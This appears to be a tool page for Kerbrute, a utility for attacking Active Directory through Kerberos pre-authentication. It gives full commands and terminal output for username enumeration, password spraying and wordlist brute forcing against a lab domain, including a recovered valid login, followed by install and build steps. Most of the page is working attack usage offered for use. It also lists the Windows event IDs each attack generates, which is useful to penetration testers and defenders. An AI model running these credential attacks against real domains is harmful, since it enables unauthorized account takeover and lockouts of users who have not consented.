Kerbrute – A Tool To Perform Kerberos Pre-Auth Bruteforcing
An account failed to log on
event 4625. With Kerberos, you can validate a username or test a login by only sending one UDP frame to the KDC (Domain Controller)Usage
Kerbrute has three main commands:
- bruteuser – Bruteforce a single user’s password from a wordlist
- passwordspray – Test a single password against a list of users
- usernenum – Enumerate valid domain usernames via Kerberos
A domain (-d
) or a domain controller (--dc
) must be specified. If a Domain Controller is not given the KDC will be looked up via DNS.
By default, Kerbrute is multithreaded and uses 10 threads. This can be changed with the -t
option.
Output is logged to stdout, but a log file can be specified with -o
.
By default, failures are not logged, but that can be changed with -v
.
Lastly, Kerbrute has a --safe
option. When this option is enabled, if an account comes back as locked out, it will abort all threads to stop locking out any other accounts.
The help
command can be used for more information
c:\Python37>kerbrute_windows_amd64.exe __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/22/20 - Ronnie Flathers @ropnop This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication. It is designed to be used on an internal Windows domain with access to one of the Domain Controllers. Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts Usage: kerbrute [command] Available Commands: bruteforce Bruteforce username:password combos, from a file or stdin bruteuser Bruteforce a single user's password from a wordlist help Help about any command passwordspray Test a single password against a list of users userenum Enumerate valid domain usernames via Kerberos version Display version info and quit Flags: --dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS --delay int Delay in millisecond between each attempt. Will always use single thread if set -d, --domain string The full domain to use (e.g. contoso.com) -h, --help help for kerbrute -o, --output string File to write logs to. Optional. --safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE -t, --threads int Threads to use (default 10) -v, --verbose Log failures and errors Use "kerbrute [command] --help" for more information about a command. c:\Python37>
User Enumeration
To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN
error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures so it will not lock out any accounts. This generates a Windows event ID 4768 if Kerberos logging is enabled.
c:\Python37>kerbrute_windows_amd64.exe userenum --dc offline.kingofthe.domain -d kingofthe.domain usernames.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/22/20 - Ronnie Flathers @ropnop 2020/05/22 14:07:55 > Using KDC(s): 2020/05/22 14:07:55 > offline.kingofthe.domain:88 2020/05/22 14:07:55 > [+] VALID USERNAME: poki@kingofthe.domain 2020/05/22 14:07:55 > [+] VALID USERNAME: guest@kingofthe.domain 2020/05/22 14:07:55 > [+] VALID USERNAME: lily@kingofthe.domain 2020/05/22 14:07:55 > [+] VALID USERNAME: yvonne@kingofthe.domain 2020/05/22 14:07:55 > [+] VALID USERNAME: toast@kingofthe.domain 2020/05/22 14:07:55 > [+] VALID USERNAME: administrator@kingofthe.domain 2020/05/22 14:07:55 > Done! Tested 7 usernames (6 valid) in 0.083 seconds
Password Spray
With passwordwpray
, Kerbrute will perform a horizontal brute force attack against a list of domain users. This is useful for testing one or two common passwords when you have a large list of users. WARNING: this does will increment the failed login count and lock out accounts. This will generate both event IDs 4768 – A Kerberos authentication ticket (TGT) was requested and 4771 – Kerberos pre-authentication failed
c:\Python37>kerbrute_windows_amd64.exe passwordspray --dc offline.kingofthe.domain -d kingofthe.domain usernames.txt lolily __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/22/20 - Ronnie Flathers @ropnop 2020/05/22 14:21:51 > Using KDC(s): 2020/05/22 14:21:51 > offline.kingofthe.domain:88 2020/05/22 14:21:51 > [+] VALID LOGIN: lily@kingofthe.domain:lolily 2020/05/22 14:21:51 > Done! Tested 7 logins (1 successes) in 0.124 seconds
Brute User
This is a traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy! This will generate both event IDs 4768 – A Kerberos authentication ticket (TGT) was requested and 4771 – Kerberos pre-authentication failed
c:\Python37>kerbrute_windows_amd64.exe bruteuser --dc offline.kingofthe.domain -d kingofthe.domain darkweb2017-top1000.txt lily __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/22/20 - Ronnie Flathers @ropnop 2020/05/22 14:27:20 > Using KDC(s): 2020/05/22 14:27:20 > offline.kingofthe.domain:88 2020/05/22 14:27:21 > [+] VALID LOGIN: lily@kingofthe.domain:lolily 2020/05/22 14:27:21 > Done! Tested 225 logins (1 successes) in 1.278 seconds
Installing
You can download pre-compiled binaries for Linux, Windows and Mac from the releases page. If you want to live on the edge, you can also install with Go:
$ go get github.com/ropnop/kerbrute
With the repository cloned, you can also use the Make file to compile for common architectures:
$ make help
help: Show this help.
windows: Make Windows x86 and x64 Binaries
linux: Make Linux x86 and x64 Binaries
mac: Make Darwin (Mac) x86 and x64 Binaries
clean: Delete any binaries
all: Make Windows, Linux and Mac x86/x64 Binaries
$ make all
Done.
Building for windows amd64..
Building for windows 386..
Done.
Building for linux amd64...
Building for linux 386...
Done.
Building for mac amd64...
Building for mac 386...
Done.
$ ls dist/
kerbrute_darwin_386 kerbrute_linux_386 kerbrute_windows_386.exe
kerbrute_darwin_amd64 kerbrute_linux_amd64 kerbrute_windows_amd64.exe
Credits
to jcmturner for his pure Go implementation of KRB5: https://github.com/jcmturner/gokrb5 . An amazing project.